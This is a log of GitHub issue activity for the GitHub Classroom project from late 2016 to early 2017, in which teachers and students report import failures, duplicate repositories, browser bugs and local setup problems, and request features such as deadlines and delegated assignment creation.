[2016-09-09 07:05] ataiya commented on #675
@cyhsutw the jupyter notebook you posted is pretty cool:
https://gist.github.com/cyhsutw/d5983d166fb70ff651f027b2aa56ee4e

However, with that you simply lose the embedded GitHub markdown editor :'(

[2016-09-09 07:14] jayvdb commented on #675
It would be nice if we could embed `.ipynb` files in `.markdown` files.

[2016-09-11 01:43] rabelmarte opened #740 "Saving an assignment with an empty title and/or slug"
If a user saves an assignment (individual or group) with an empty title and/or an empty slug on the settings page, the site crashes.

[2016-09-13 20:52] #740 closed

[2016-09-13 23:18] go-bears commented on #503
hi @willprice , I just had a conversation with @tarebyte about this issue b/c I wanted to work on it.  The 60-char limitation is a kind of safeguard for teachers. Git apparently won't make repository if the path to the repo or file names are too long.  I hope this information helps!

[2016-09-14 10:35] willprice commented on #503
HI @go-bears that's useful to know! Thanks for the information.

[2016-09-17 12:50] dhowe commented on #534
is is impossible for students to simply submit a PR on master back to the original (teachers) repo?

[2016-09-17 12:53] dhowe commented on #448
any update on this?

[2016-09-19 07:23] dhowe commented on #595
+1

[2016-09-19 07:36] dhowe commented on #379
Any progress on this? Or is there some other submission (mark as final/lock branch) feature being implemented somewhere?

[2016-09-19 11:33] Repairio opened #747 "Authentication error"
Unable to authenticate; cannot push to my class' repo.

[2016-09-19 13:31] tarebyte commented on #747
@Repairio just to make sure I understand your issue, you don't have access to the GitHub repository?

[2016-09-19 14:01] cyhsutw commented on #379
Hi @dhowe :wave:, thanks for commenting.

While the due date feature is not yet implemented, we have a possible way to let students specify the version of their works to be graded.

In #720, students need to create [releases](https://help.github.com/articles/creating-releases/) in their repos and we'll using the publishing timestamps as their submission dates.

[2016-09-19 19:23] Repairio commented on #747
@tarebyte

I did have access when I experienced the error. I then left so I might rejoin in hopes to solve the issue, but the join page views as if I still have access.

I think the authentication error may be on my side, since I am also unable to push to my own repo.

[2016-09-23 03:05] jayvdb opened #748 "Error message for URL in starter code"
If I add a Github URL to the starter code box, the error message is "The listed users and repositories can not be searched. ...."

It should say to use a SLUG, not a URL.

[2016-09-23 03:15] jayvdb commented on #260
See also #673, about not being able to choose a default branch, which is a small part of this feature request.

[2016-09-23 03:17] jayvdb opened #749 "Add option to copy the wiki from the starter code repo"
Like #546 , for copying the wiki.

My assignments are copies of existing OSS projects, so the assignment text cant be on the `master` branch.

Using an extra branch is not user friendly, as it can't be the default branch (#673) , which means the students need to find the branch - the GitHub interface for non-default branch is not intuitive.

Using issues from the starter repo will be an improvemen

[2016-09-23 04:01] jayvdb opened #750 "UI freeze returning to assignment list"
Steps to reproduce:

1. Login
2. Click on the orgs classroom
3.  Click on an existing assignment
4.  Press browser back button

Result:

Busy icon indefinately spinning

Expected results:

Return to a fubctional assignment list page

[2016-09-23 12:55] tarebyte commented on #748
@jayvdb looking at the screenshot below
<img width="520" alt="screen shot 2016-09-23 at 08 52 47" src="https://cloud.githubusercontent.com/assets/564113/18786307/3255e93c-816b-11e6-981e-cefd607d4baf.png">

We don't actually specify how to search for the repositories. Would this make it more clear?

<img width="480" alt="screen shot 2016-09-23 at 08 55 13" src="https://cloud.githubusercontent.com/a

[2016-09-23 13:10] jayvdb commented on #748
Yes.

[2016-09-24 02:54] jayvdb commented on #379
Editing the tag for a release is able to be detected?
https://help.github.com/articles/editing-and-deleting-releases/

[2016-09-24 11:33] CGA1123 commented on #749
I don't think creating independent copies of wikis is the best way forward for sharing large portions of information for assignments.

The larger the amount of info, the more likely it'll need some changes, or will have some mistakes in it.

Creating independent copies of wikis, will make it a pain to propagate changes to the wiki through to all students, would it not?

[2016-09-25 14:06] #750 closed

[2016-09-26 21:51] tarebyte commented on #734
Hi @rhm12399,

I'm currently looking into this, I need to build a little bit of tooling into Classroom to get a full scope of what's going on here.

Thank you for your patience!

[2016-09-27 01:55] tarebyte commented on #734
@rhm12399 there is some kind of weird caching bug going on, I can confirm that your student repositories were created and are GitHub.

[2016-09-27 06:54] rhm12399 commented on #734
Make some sense.  Sometimes I see more repo links instead of deleted upon a
refresh

On Mon, Sep 26, 2016 at 6:55 PM, Mark Tareshawty <notifications@github.com>
wrote:

[2016-09-28 15:40] M4urice commented on #379
As a (temporary) workaround I wrote a script which pulls all repositories from a given list and applies a checkout for the given deadline. (assuming the students repos all have their latest work on the master branch).

This was an easy way for us to ensure we only grade the students work up until a deadline without having them fumble around with tags, branches and such (many students were not fami

[2016-09-28 16:00] ErinCall opened #764 ""Request a discount" page gets messed up if you hit Back"
Steps to reproduce:

1. go to https://education.github.com/discount_requests/new
1. fill out the first page
1. click "Next"
1. hit "Back" in your browser
1. Now the "Next" button is disabled. AFAICT changing the form fields doesn't help, and neither does refreshing.

I'm seeing this in Firefox; haven't tried it in Chrome.

[2016-09-30 00:43] jayvdb commented on #377
I invite my students to the org as either part of a team with low privileges, or as outside collaborators.
It would be nice to restrict assignments to only be used by someone affiliated with the org.

It will be possible to automatically set an invitation used-by date, when there is a deadline for the assignment (#379).
Obviously it doesnt make sense to allow people to create assignments after the

[2016-09-30 00:45] jayvdb opened #765 "Allow non-owners to create assignments"
As the end of my course, I have a custom assignment for each student. It is a significant amount of work to set up, but it has great results.

I want to delegate the creation of assignments to a paid intern.
I do not want to give them Owner rights on the GitHub org.

[2016-09-30 01:56] johndbritton commented on #765
@jayvdb This is a reasonable request. Do you have any suggestions for how to manage this access? How would you like to grant access to create assignments?

[2016-09-30 02:09] jayvdb commented on #765
I'm flexible on how it is implemented.  They are reasonable trusted people, but not trusted enough to be a github Owner.  Some ideas:

- an editable list of admins at https://classroom.github.com/classrooms/xxx/settings/invitations
- A "classroom admin" team managed on github would be better, and then specify the team name in GitHub Classroom.
- A checkbox to allow [team maintainers](https://help.

[2016-09-30 09:37] robmuh opened #766 "Commits needed on starter import?"
I noticed during the creation of assignments that had several commits that the import took notably longer. I realize after a while the assignment repo can be rebased to contain nothing but one commit, but is there any way this could be built into the classroom assignment process? Could it just look at the last version and not include the commit history? Thanks in advance.

[2016-09-30 10:15] robmuh commented on #665
We have 'Create Your First Site' as one of our [*Prep*](http://prep.skilstak.io) assignments and have found through trial and error that it is best not to clutter up a student's personal GitHub repo of any kind with educational repos. With GitHub Classrooms now there is absolutely no need. IMHO, nothing in a student's repo should be there that they do not want to show potential employers and peers

[2016-09-30 11:34] robmuh opened #767 "Custom Labels Retained Through Assignment Invites"
Just tested creating custom Labels (Signed, Suggestion, Reviewed, etc.) and deleting the "Won't Fix" and other confusing labels that are less relevant for an assignment repo and noticed they did not remain after the student accepted the invitation. Having these labels remain (as well as having any initially created issues also remain) is one of the most valuable additions to GitHub classroom that

[2016-10-01 00:18] sxlijin commented on #379
So I'm reminded of XKCD, a la

![alt text](https://imgs.xkcd.com/comics/standards.png)

but we ended up developing our own workflow as well - none of us had realized that GH Classroom was open-source - which grabs the tree corresponding to `master`, checks out a `feedback` branch, resets `HEAD` to point at the tree corresponding to the code that they were provided (we keep this in a skeleton repos

[2016-10-01 19:49] sxlijin commented on #582
I'm in favor of setting webhooks on assignments. I think the config file solution is essentially just a custom `.travis.yml` solution.

I may be missing something here though, but wouldn't automatically enabling Travis CI for an assignment do the trick?

[2016-10-02 05:52] sxlijin commented on #379
[Cobbled together a Python script that doubles as a CLI tool for managing branch protection](https://gist.github.com/sxlijin/b4ad4361fd78712d45dccd7da2d7b9d4). Warning: the protected branches API is still under preview and is not stable, so there's no guarantee that this will work at any given point in the future.

[2016-10-02 21:45] bjb568 commented on #603
It would be incredibly annoying as a student to have my repository frozen before I get other students on my team to drag along as I do all the work regardless. Forcing a minimum number of group members seems like it would just be a needless constraint that impedes students with little benefit to anybody. If this gets implemented, I hope the usability from the student perspective is given a good bi

[2016-10-03 05:36] jayvdb commented on #766
This is undesirable IMO.  Not including the commit history means creating an incompatible repository.  i.e. it wouldnt be possible to use git features, e.g. to compare the student repo with the starter repo.

If a teacher wants to optimise their starter repo, they can & should do it themselves.  Maybe some documentation could be added to assist.

[2016-10-03 05:37] robmuh commented on #766
Can you provide a scenario where having the previous starter repo commits is valuable? I'm honestly curious.

[2016-10-03 05:50] jayvdb commented on #766
All of my assignments are existing OSS repositories, with important commit history.

[2016-10-03 06:26] jayvdb commented on #729
This is happening to me very regularly on https://github.com/BesutKode .

To make matters more annoying, if I delete the `x-1` repo, the Classroom UI shows it as a deleted repository, despite the fact the student is busy working in the repository without the `-1` suffix.  This might be related to #734 . ping @tarebyte .

An example of this deleted repository problem is https://classroom.github.com

[2016-10-03 06:44] robmuh commented on #766
Ok, I can get behind that—especially when teaching OSS software itself or as an exercise in OSS contribution practice.

[2016-10-03 06:44] #766 closed

[2016-10-05 17:35] jasonnutter opened #768 "Import notification goes to wrong email"
When a student accepts a Github classroom invite and their repo is imported into the organization, the notification goes to the main email address for your account, instead of the email address you have configured to receive notifications for that organization.

Repro:
1. Setup your organization and Github classroom, and [configure notifications for that organization to go to a different email add

[2016-10-09 19:15] robwhess opened #769 "More elegantly handle multiple assignment URL clicks by the same student"
Currently, if a student who's already accepted a particular assignment follows the assignment link and clicks the button to accept the assignment again, a second assignment repo is created for that student with a "-1" appended to its name.  If they do it again, another repo is created with a "-2" appended, and so forth.

In my opinion, a more elegant behavior would be this: if a student (identifie

[2016-10-10 01:11] drbeco commented on #603
Not *forcing*, but an optional setup. Of course all students can talk to each teacher to see if it will or not be used in each project. Once the teacher in agreement with the students set the minimum, there is no other way to give this option some sense except to freeze until it is met. (What good a minimum that can be ignored will do after all?)

If the project doesn't need a minimum, it will be

[2016-10-11 00:39] bjb568 commented on #603
I think it's a lot more important to teach students the reality that their individual work is much more important than group work and successful group work both in school and at work means doing other people's work. Just considering the student UX, software-mandated minimum group sizes and freezes on projects before more names are found to be tacked on seems like an annoyance that serves only to s

[2016-10-11 13:17] HugoLnx commented on #603
Hi! As a student, I agree with bjb568 that would be annoying to be blocked until the group have the minimum.

Maybe a better way to do that would be to the teacher set the amount of students that will make the assignment and the amount of groups teacher want so Classroom can create balanced groups with fixed sizes that students choose which one they want to join. Suppose you have 31 students and y

[2016-10-11 18:52] kohler opened #770 ""Assignment failed to be created""
Thanks for creating this system. In our class (organization `cs61`), students are having trouble with a new assignment. On accepting our classroom link:

**Redacted for privacy purposes** - tarebyte

our students see “Assignment failed to be created”, or another error message, “Cannot retrieve this organizations repo plan, please reauthenticate your token.” Any help possible?

[2016-10-11 19:15] tarebyte commented on #770
@kohler without getting in to `@mention` user name specifics (email me tarebyte AT github DOT com if you'd like to know more) you removed an owner from your organization who happened to create the assignment your students are trying to access.

Since their token is not longer valid it was causing an error when accepting the assignment.

I've moved over all of the assignments so that they use your

[2016-10-11 19:19] tarebyte commented on #770
@kohler I've just checked and it seems to be working now, please let me know if I can be of anymore help.

Thanks!

[2016-10-11 19:19] #770 closed

[2016-10-11 19:23] kohler commented on #770
Great, thanks so much for awesome fast service!!! Could I have figured this out from the UI?

[2016-10-11 19:25] tarebyte commented on #770
Unfortunately no, being able to remove admins from your Classroom is one of the many features I need to open an issue for 🙁

[2016-10-12 02:41] jayvdb commented on #769
Dup of #729
Allowing only one repo creation at a time will solve this.

[2016-10-15 11:07] jayvdb commented on #770
I also hit this bug today when I temporarily gave @yukiisbored Owner rights to work around #765 . The created assignments could not be used after I revoked his Owner rights.

[2016-10-15 11:13] jayvdb commented on #765
#770 shows another reason for this feature request. Owner rights are likely to be removed proactively, while other roles and perms are not so concerning. If a Owner is de-Ownered, the assignments they created are unusable in the future.

[2016-10-15 15:55] mariopineda commented on #664
Everytime my students are trying to accept an assignment they get the following error message (see screen shot). If they click on the accept button again (which the message seems to suggest one should do) they end up with multiple copies of the assignment repository.

Screenshot of error (top) and an example of multiple copies of the same assignmnt repo caused by clicking on the accept button more

[2016-10-15 17:23] tarebyte commented on #664
@mariopineda it looks like one of the owners of your org was removed and so we were still trying to use their token.

I've removed that user from your Classroom. Please let me know if you have any other questions.

[2016-10-19 02:59] sxlijin opened #772 "Repository Import Fails"
When students import a repository, that import may fail and leave their repository in an unworkable state. The workaround seems to be for either (1) the student to delete the repo and re-import (i.e. re-create their repo for the assignment) or (2) someone to force-push a clone of the repo to the repo with the failed import.

It seems to me that if it really has to be the case that this process sho

[2016-10-19 12:54] tarebyte commented on #772
@sxlijin thanks for reporting this, so the importer is outside of the control of Classroom as it's part of the GitHub.

However I will take a look to see if there is a better way of doing a retry on the Classroom side.

Thanks!

[2016-10-19 22:13] sxlijin commented on #772
@tarebyte is there somewhere on the GH side where I can/should open this as an issue?

JW if this is a known bug or if there's someone that could use more details about this.

[2016-10-21 11:35] parth2699 opened #773 "SERVER ERROR 500"
When I am logging into github education student developer pack I am not able to log in. It is giving me an error 500. How shall I resolve this ?

[2016-10-21 14:46] sanicki commented on #773
This repository is for GitHub Classroom. If you have questions about the GitHub Student Developer Pack please contact us at https://education.github.com/contact.

[2016-10-21 14:46] #773 closed

[2016-10-22 02:46] liffiton opened #775 "Automatically add students to watch list on their repositories"
When a student creates a repository from an assignment, they do not appear to be added to the watch list for their new repository.  I, as the actual "creator" of the repository, am automatically watching it, but it would make a lot of sense for the student to watch automatically as well.  If I understand correctly, this would mean they would be notified of comments I make on their commits, for exa

[2016-10-29 07:18] bpesquet opened #776 "Group assignment creation is impossible with Firefox 49"
Hi,

**Update**: this doesn't happen in Chrome.

When I try to create a group assignment for my organization (@ensc-glog), the **Create Assignment** button stays disabled event after filling all the fields. I am able to create an individual assignment for the same orga.

In both cases, the search field for adding starter code from a repo doesn't work.
![bug classroom](https://cloud.githubuserconte

[2016-11-01 01:34] yingjerkao commented on #776
Similar behavior for Safari 10.0.1  on MacOS 10.10.5

Works fine on Chrome too.

[2016-11-01 12:42] tarebyte commented on #776
Hi @bpesquet apologies for the inconvience, I've revert the JS changes and confirmed that I can make a group assignment on Firefox.

![firefox](https://cloud.githubusercontent.com/assets/564113/19890111/0e5f7652-a00f-11e6-89b0-0f6d4cd737dc.gif)

[2016-11-01 12:42] #776 closed

[2016-11-03 14:48] tmandel opened #779 "Student cannot create repo"
A student is unable to create a repo for an assignment in the course I am TAing by clicking the invitation link.  They simply get an "assignment failed to be created" error (see attached screenshot).  They tried several times last night, logging out and logging back in, nothing worked.  They've been able to create repos in this manner before (using the same Github account). Any idea how to fix thi

[2016-11-03 14:58] cyhsutw commented on #779
@tmandel I was facing the same issue you described a few hours ago. And I think this is due to the temporary failure of GitHub's source import function.

I just tried a couple of minutes ago and it works fine for me now.

[2016-11-03 21:11] tmandel commented on #779
@cyhsutw Thanks! I contacted the student and he was finally able to do it today.  Hopefully this doesn't happen again.

[2016-11-07 17:20] Shekharrajak opened #780 "Problem in setup"
Hello,

I am redirecting my question from gitter channel to here.  I am following [setup guide](https://github.com/education/classroom#setup-github-classroom) but when I do
[code]

I see `su: Authentication failure` .

And when I do script/setup I get this error msg :
[code]

What else I need to do, to run it locally?

[2016-11-08 01:44] mcoblenz opened #781 "Private repositories should be the default for new individual assignments"
A student just emailed me to tell me he could see other students' repositories! I changed the visibility setting, but it seems to me that "private" is the safest default for new assignments.

[2016-11-08 12:14] mcoblenz opened #782 "Changing repository visibility only affects new repositories"
I was informed that my students could see each others' code for an individual assignment, so I changed the visibility in the assignment to private. Unfortunately, this only affects NEW repositories created under the assignment, not existing ones! This behavior is dangerous and misleading. Changing the visibility setting should affect all repositories under the assignment.

[2016-11-09 22:30] lindsaymarkward opened #783 "Feature request: find repo by name/email"
See https://education.github.community/t/find-students-repos-by-name/5599 for details
I would like to be able to:
a) search for a repo within an assignment by using the name and/or email of a 'student'
b) see all of the repos on one page (no pagination)

Thank you.

[2016-11-13 15:55] csteacherd22 commented on #595
Agreed. More classrooms per organization is crucial - anything else is basically a kludge.
What is the status on this feature request?

[2016-11-14 06:33] tmandel commented on #779
Another student is having the same issue tonight.  Seems to be a recurring theme, and is very frustrating as some students will inevitably wait to accept the assignment until shortly before the deadline, leaving little margin for error.  Anything we can do as instructors beyond telling the student to wait it out?

[2016-11-14 14:03] tarebyte commented on #779
@tmandel I'll take a look at it now, not entirely sure what's causing your issue.

[2016-11-14 16:40] dhowe commented on #779
same problem here, recurring quite often (maybe 5% or more of the time )
very frustrating for everyone involved...

[2016-11-15 18:47] joenash opened #784 "Failed import due to freeze resulting in bare repository"
From a user with approx 250 students, making weekly assignments.

[2016-11-15 18:47] joenash commented on #784
cc @tarebyte

[2016-11-15 20:11] jayvdb commented on #784
I encountered something very similar to this last week, and it has only happened once.  To work around the problem, we pushed the "starter code" repo into the student assignment repo.

[2016-11-16 02:14] lindsaymarkward opened #785 "Broken link to forum on GH Classroom"
Hi. When I'm logged in at https://classroom.github.com/classrooms there's a link to the forums (looks like two speech bubbles). This takes me to a broken page:
https://education.github.community/t/introduce-yourself/32
"Oops! That page doesn’t exist or is private."

[2016-11-16 03:55] dhowe commented on #784
Same here -- very frustrating, as the students think they've done something wrong, and try all sorts of random solutions, when actually it is a github bug. For us it seems to happen maybe 3-5% of the time or more; then the teacher has to manually push the starter code into the students repo -- a huge hassle in a class of 200.

[2016-11-16 07:28] cyhsutw commented on #780
Hi @Shekharrajak,

I am not sure about the operating system you're using, but I'd like to give my two cents about the problem (which same as yours) I encountered while trying to setup Classroom locally on my Ubuntu machine several months ago.

As stated in this [stack overflow question](https://stackoverflow.com/questions/7695962/postgresql-password-authentication-failed-for-user-postgres), there'

[2016-11-17 20:02] javier-op opened #786 "empty assignment reporsitory"
after clicking the assignment link, it just creat an empty repository, no starting files.

[2016-11-17 20:27] tarebyte commented on #786
@javier-op can you give me a little context?

Did the assignment have a starter code repository that it was supposed to use?

[2016-11-17 20:34] javier-op commented on #786
Yes, it's supposed to have a .tex and a .pdf file with the instructions. I
used a link provided by my teacher to create the repository but when in the
"Preparing your new repository" page I got redirected to a server error and
an empty repository was created. I contacted my teacher to try accepting
the assignment again but I'm currently stucked in "Preparing your new
repository".

On Thu, Nov 17,

[2016-11-17 20:38] tarebyte commented on #786
@javier-op can you email me tarebyte @ github dot com and I can try to help you out.

Thanks!

[2016-11-18 04:26] dhowe commented on #786
This is a regular occurrence, documented in other tickets (#784 and others), where somewhere between 1-5% of all repositories created are empty like this.  Until this [big] bug is fixed, you (the instructor) need to push the start-code into the students repo manually

[2016-11-18 06:19] Shekharrajak commented on #780
Thanks @cyhsutw , but I am getting this error :
[code]

I am trying to solve this by stackoverflow answers, but they are not working. I am using kali linux system.

[2016-11-18 12:16] Shekharrajak commented on #780
Thanks now  `script/setup`  is working fine and I have edited the `.env` file as well. But I am getting error when I run `script/server`
[code]

[2016-11-18 17:53] lhscompsci commented on #786
This is the screen I have a bout 1 in 200 times where things get stuck:
![image](https://cloud.githubusercontent.com/assets/5266774/20440361/6a4e04aa-ad85-11e6-8361-02d789a95f51.png)
I don't know if this is the same error but I couldn't even delete the bad repository for the first student this happened to.  We had to just have a completely separate outside-of-classroom repo for him at the end of i

[2016-11-19 04:07] sxlijin commented on #772
@tarebyte has there been any progress on this?

I only ask because we're seeing (slightly) more reports of failed imports.

[2016-11-19 13:08] Shekharrajak commented on #780
What this error means ? Ping @cyhsutw

![screenshot from 2016-11-19 18 30 04](https://cloud.githubusercontent.com/assets/5774448/20455659/cf575386-ae86-11e6-8190-1173522cb840.png)

[2016-11-19 13:16] cyhsutw commented on #780
@Shekharrajak Probably an issue with mislinked `node` runtime, can you try `node -v` in your terminal and tell us what's the output?

[2016-11-19 13:54] Shekharrajak commented on #780
@cyhsutw ,

[code]

I was searching these issue in stack overflow but didn't find solution.

[2016-11-19 16:32] Shekharrajak commented on #780
I have fixed this issue (I installed linuxbrew to fix some problems of postgres , I uninstalled it. Now it is working fine). But I am getting 'client ID/secret ID incorrect' error. I am trying to fix it. Thanks.

[2016-11-19 16:50] Shekharrajak commented on #780
When I try to sign In I get this error
[code]

[2016-11-19 18:51] Shekharrajak commented on #780
Now I have fixed all the problems, it is working fine in my local system. But when I tried to login behind the proxy, it doesn't work.

Error :
[code]

Do you know how to run this behind the proxy ?

I think once I login (without proxy, normal internet) then I don't need of authentication again(so it will work fine behind the proxy as well) and I can do other things.

[2016-11-19 23:30] Youssefares commented on #713
Hey @johndbritton , anyone working on this or should I just go ahead?

[2016-11-20 05:23] tarebyte commented on #713
@Youssefares, please feel free to work on this!

[2016-11-22 23:04] tarebyte commented on #785
@lindsaymarkward I think it may have just been a Discourse issue, the page is back now.

Thank for reporting it though 💖

[2016-11-22 23:04] #785 closed

[2016-11-23 06:52] cyhsutw commented on #780
@Shekharrajak Could you provide more details about what kind of proxy technology are you using?

[2016-11-24 14:53] alexanderbazo commented on #784
Same here. The problem does not seem to be reproducible but has occurred for ~10 out of 60 students.

Not sure about the following:
It seems to happen more frequently when a lot of students tried to import the source repository simultaneously during class. There were fewer problems reported when the students imported a similar test assignment at home (and not simultaneously).

[2016-11-25 16:39] Shekharrajak commented on #780
@cyhsutw , it is just a proxy system in college LAN.Right now I am using my mobile internet.

[2016-11-26 21:04] bnmnetp opened #794 "Suddenly, all of my links to student assignments look like this"
<img width="1099" alt="screen shot 2016-11-26 at 3 01 35 pm" src="https://cloud.githubusercontent.com/assets/51115/20643868/9dd06092-b3e9-11e6-8c02-ec796ea51cb1.png">

[2016-11-27 21:23] tarebyte commented on #794
@bnmnetp I took a look and I can't seem to reproduce your issue. Does it consistently happen for you?

[2016-11-28 00:26] bnmnetp commented on #794
Well, it is happening consistently in Safari 10.0.1
I don't see any messages in the Javascript Console, and I have cleared all cookies, cache and local storage for GitHub.   This is on a new MacBook Pro so there isn't much of anything installed (yet) that could be causing conflicts.

Using Chrome on the same machine I can get to the student assignments, so at least I have a workaround.

[2016-11-28 03:03] #794 closed

[2016-11-28 03:04] tarebyte commented on #794
@bnmnetp everything should be good now. Sorry for the inconvience!

[2016-11-28 15:13] sxlijin commented on #772
Bump - @dhowe has collated a list of related issues, which I'm reiterating below to link the GH topics:

* #779 - "Assignment failed to be created"
* #784 (duplicate)
* #786 (duplicate)

@tarebyte I'm happy to help out with a solution if you can point me at something in the codebase.

[2016-12-06 16:55] meneguzzi commented on #784
Same thing with me throughout the semester, however, this seems to have been a lot more frequent than 1 in 6. Some students seemed to have been unluckier than others. I tried deleting the repos and asking the students to try again, only to see the same thing happen over and over.

[2016-12-09 19:40] dudumalafay opened #804 "prograa"

[2016-12-09 19:40] #804 closed

[2016-12-13 07:05] weilandia commented on #783
@tarebyte I can work on this if no one else has started. Let me know!

[2016-12-13 15:25] tarebyte commented on #783
@weilandia feel free to!

[2016-12-14 11:09] tamastompa opened #808 "Students cannot use a public assignment repository"
We have a public repository for a public individual assignment:
https://classroom.github.com/classrooms/19305404-codecool_bp_2016_1/assignments/from-python-to-java-pokerclient/settings
Base repository (also public):
https://github.com/CodecoolBP20161/from-python-to-java-pokerclient

But when our students would like to accept the invitation for this assignment, they get an error:
"Cannot make this

[2016-12-14 12:15] immanuelfodor commented on #808
At another school group, we have a public individual assignment which also behaves like @tamastompa described.
Assignment: https://classroom.github.com/classrooms/21174577-codecool_bp_2016_2/assignments/python-oop-si-exercises-2/settings
Public base repo: https://github.com/CodecoolBP20162/python-application-process-base

A student of ours sent this screenshot from the same error:
![image](https:/

[2016-12-14 13:12] tarebyte commented on #808
Sorry for the trouble, I'm taking a look at this issue right now.

[2016-12-14 13:35] #808 closed

[2016-12-14 13:36] tarebyte commented on #808
Sorry for trouble 😢  I just merged #809 which fixes your issue.

[2016-12-14 15:55] Shekharrajak commented on #780
I didn't understand this error means `CLASSROOM_WEBHOOK_URL_PREFIX is not set, please check your .env file` what I need to add in `WEBHOOK_SECRET` ?
Ping @cyhsutw

[2016-12-14 16:06] tarebyte commented on #780
@Shekharrajak your `WEBHOOK_SECRET` can be any value you just need to update your `.env` file.

Example:

[code]

[2016-12-14 19:08] tarebyte commented on #772
@sxlijin looking at this again, unless we constantly pull from the [GitHub API](https://developer.github.com/v3/migration/source_imports/#get-import-progress) we don't know if the source import was successful.

I'm not sure how I feel about it because that could be really expensive depending on the size of the repo and the number of assignments.

What do you think?

[2016-12-14 23:23] sxlijin commented on #772
Would it make sense to perhaps clone the repository to Classroom when the assignment is first set up, and then clone from Classroom to GH every time a student creates their own repo?

[2016-12-14 23:49] tarebyte commented on #772
@sxlijin we made the decision a long time ago to not do something like that just because we didn't want to store other users code if it is private.

It's also tough because Heroku doesn't let us write to disk so we'd have to send it to an S3 bucket or something like that.

[2016-12-15 06:57] Shekharrajak commented on #780
Thanks @tarebyte , but I still get the same error `CLASSROOM_WEBHOOK_URL_PREFIX is not set, please check your .env file`, when I try to `Select an organization for your new classroom` and click on org.

[2016-12-15 15:32] tarebyte commented on #780
@Shekharrajak looking at your fork, it's 125 commits behind master.

Maybe try bringing it to the latest master and try it again?

[2016-12-15 23:25] sxlijin commented on #772
@tarebyte that's a fair concern, but I imagine most of the Classroom user base uses private organizations is to make sure students do their own work, not because their livelihood depends on the confidentiality of their IP. I do understand, though, and agree that it is something that does merit effort in avoiding.

Is there something you could do on the GH side to see why it might be that the impor

[2016-12-15 23:42] tarebyte commented on #772
I don't think frequently is quite accurate, there are way more imports that are successful. I don't have hard data, but I don't think that it's even 1% tbh.

I can ask my colleagues at GitHub, the porter is not really in my wheel house.

You're correct you can't do that, there isn't a way to do that in GitHub in general. The way someone would "detach" a fork is by pushing it up again as a new proj

[2016-12-16 05:44] Shekharrajak commented on #780
@tarebyte , I updated the upstream/master branch locally in my system (using git fetch and rebase) it is latest in my system. The last commit I see is
[code]
I am trying to figure out the problem.

[2016-12-17 05:11] sxlijin commented on #772
Could be just an issue of the vocal minority here, so I suppose that's fair.

It's my understanding is that GH staff have the ability to disconnect forks, although obviously I don't know any of the details behind how this works.

And now I understand the S3 mention...

<hr/>

To clarify, so that I'm not missing anything, the tool that's used for repository clones is the [GitHub Importer](https://h

[2016-12-17 16:12] tarebyte commented on #772
It may be a staff tool (I honestly have no idea), however this is an open source project which means that everything we use must be available to everyone.

That is correct

This could be done via the API, in what I call an API transaction where if one part of the process fails everything else is undone ([example](https://github.com/education/classroom/blob/a0975fa566daaf2a3349d50c2ee883d19591334d/

[2016-12-17 18:03] sxlijin commented on #772
Agreed on not using Git under the hood; the `ls-remote` suggestion was more of a "the API should support this, I just don't know the API call off the top of my head".

Tangent: I like [this commit message](https://github.com/education/classroom/commit/b3fe03e7bfc72499ce46c626835213cafec20918), by the way.

:+1: the main issue that comes to mind, though, is that right now the user flow redirects th

[2016-12-17 18:24] tarebyte commented on #772
It would, we'd have to wait for all parts to complete and then redirect the student.

Unless the student has admin rights to the repository there isn't anything they can do about the repo deletion failure, so I didn't bother letting them know about it.

[2016-12-20 04:17] drbeco commented on #603
The problem with that is that the number of students decay over the semester. Some drop in the first weeks, having started the first assignments, some drop in the middle, completing the initial assignments and maybe starting some others... And you never know, you can't predict, and even if they contact the professors to tell they will drop, that is the kind of management that professors won't have

[2016-12-20 17:25] Shekharrajak commented on #780
[code]

When I do `/script/ngrok` I get this :
[code]

What I need to fill there ? Ping @tarebyte @cyhsutw

[2016-12-20 22:06] cyhsutw commented on #780
In your case it can be either `https://b455dbf1.ngrok.io` or `http://b455dbf1.ngrok.io`.

You'll need to keep ngrok running when running the server locally.

[2016-12-21 04:19] Shekharrajak commented on #780
Thanks @cyhsutw .
Now It seems a problem in `WEBHOOK_SECRET='12345' `

![xleyyvyxme](https://cloud.githubusercontent.com/assets/5774448/21377222/a9c59f98-c762-11e6-8cfd-8e4d5444fe4e.gif)

[2016-12-21 11:48] johndbritton commented on #768
Thanks for reporting this @jasonnutter. This is a bug in the GitHub import API. I reported the issue to the team a while back and it's in the backlog to be addressed. I'm going to leave this issue open so that we can update you when the fix is made but just wanted to let you know we're aware of the issue.

[2016-12-21 15:27] tarebyte opened #812 "Allow staff to remove `Users` from `Organizations`"

[2016-12-21 15:27] tarebyte opened #813 "Allow staff to delete `Groups` and `Grouping`"

[2016-12-21 15:28] tarebyte commented on #812
/cc @nwoodthorpe

[2016-12-21 15:28] tarebyte commented on #813
/cc @nwoodthorpe

[2016-12-23 00:42] nwoodthorpe commented on #812
Cheers 🎉

For the button, I was thinking of one of these two types of buttons. I found both of them in the GitHub settings, so I'm not sure what the preferred one is. I made mocks in Photoshop, which do you prefer?

Trashcan, like in the Emails section of the settings
<img width="770" alt="trashcan" src="https://cloud.githubusercontent.com/assets/4149056/21444682/6bd70a88-c87e-11e6-9e89-d36cff5c0c

[2016-12-23 04:22] tarebyte commented on #812
@nwoodthorpe if you use the `danger` class on the buttons it will have both styles from 2 and 3. I'd like the explicit text instead of just the icon.

[2017-01-01 14:08] Shekharrajak commented on #780
Thanks, I have set up the repo in my system. Let me know how can I start contributing with small PR. Please suggest any easy to fix bug/project.  Ping @cyhsutw @tarebyte

[2017-01-03 21:07] DouglasUrner opened #817 "Students are unable to accept an assignment"
I've created an assignment in GitHub Classroom where I want students to be able to upload work that they started before we started using Classroom. My thought was to create an empty repository to which students would upload work, so the assignment has no starter code. You can see this assignment here: https://classroom.github.com/assignment-invitations/cc958fa0a39a2994ca5ad87a8c150b4b

When studen

[2017-01-03 22:19] Gaelan commented on #817
My account was the one that worked from outside the school. My account is several years old (unlike student accounts, created recently), so there are probably various things about it which make it different. Also, I have my own GH Classroom on my account (for testing), so maybe GH Classroom has a different OAuth token for me than the one it has for students?

[2017-01-03 22:41] tarebyte commented on #817
@DouglasUrner @Gaelan I've just pushed a fix that should resolve your problem. Please let me know if you run into any other issues!

[2017-01-03 22:41] #817 closed

[2017-01-05 14:38] tamastompa opened #819 "Students cannot accept assignment invitations"
When we create a new assignment, we have the invitation link.
When a user clicks on that, the Github asks "Authorize application", and "Reauthorization required".
Then when the user clicks on the "Authorize application" button, it doesn't do anything, but redirects to the same page.
So finally the user cannot make a new repo for the assignment :-(

[2017-01-05 16:25] tarebyte commented on #819
